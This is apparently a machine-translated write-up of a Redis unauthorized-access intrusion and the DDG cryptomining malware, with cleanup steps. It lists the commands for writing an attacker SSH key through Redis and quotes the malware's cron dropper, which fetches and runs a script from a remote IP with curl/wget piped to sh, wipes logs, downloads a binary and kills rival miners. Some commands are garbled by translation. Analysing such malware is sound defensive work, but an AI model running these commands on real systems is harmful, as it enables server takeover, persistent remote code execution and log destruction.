The invasion of principle

The attacker uses redis to connect to the server and writes the public key of SSH secret-free login to the server

  1. Generate the SSH public and private key file and write it to the file to be sent

    • Ssh-keygen -t rsa -c "XXX"
    • echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n" > foo

  2. Connect to the target server

    redis
Copy the code

    Service and clear all data

    • Redis - cli - h 12.34.56.78
    • flushall

  3. To write the public key to the target machine

    authorized_keys
Copy the code

    file

    • The cat foo | redis - cli - h 12.34.56.78 - set crackit x
    • Redis - cli - h 12.34.56.78
    • config set dir /root/.ssh/
    • config get dir
    • config set dbfilename "authorized_keys"

  4. Remotely log in to the target server

To solve the process

Solution steps:

  1. Shut downredisUnauthorized port
  2. Clean up what was writtenauthorized_keys
  3. remove/var/spool/cronA scheduled task in a directory
  4. Kill the processqW3xT.4andddgs.3016
  5. delete/tmpExecute file underqW3xT.4andddgs.3016

Analysis is as follows:

  • 15 * * * * * / curl - fsSL http://216.155.135.37:8000/i.sh | shScheduled task grab pulli.shThe following
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "15 * * * * * / curl - fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
echo "15 * * * * * / wget - q - O - http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "15 * * * * * / curl - fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "15 * * * * * / wget - q - O - http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

rm -rf /var/cache /var/log
ps auxf | grep -v grep | grep /tmp/ddgs.3016 || rm -rf /tmp/ddgs.3016
if[!-f "/tmp/ddgs.3016" ]; thenhttp://216.155.135.37:8000/static/3016/ddgs.$wget - q (uname -m) - O/TMP/DDGS. 3016 curl - fsSL http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) - o/TMP/DDGS. 3016fi
chmod +x /tmp/ddgs.3016 && /tmp/ddgs.3016

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill2. 'rm -rf /var/cache/var/log3. Download the main file 'ddgs.3016' and perform 4. Kill other mining processes in the systemCopy the code
  • Remove the address in the scripthttp://216.155.135.37:8000/static/The following files exist

  • disable.shAs follows:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty

ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill
Copy the code

This script also hollowed program running and other yilu address https://www.yiluzhuanqian.com/

I love to break the analysis of this virus 3014 on the latest DDG variant 3014 sample analysis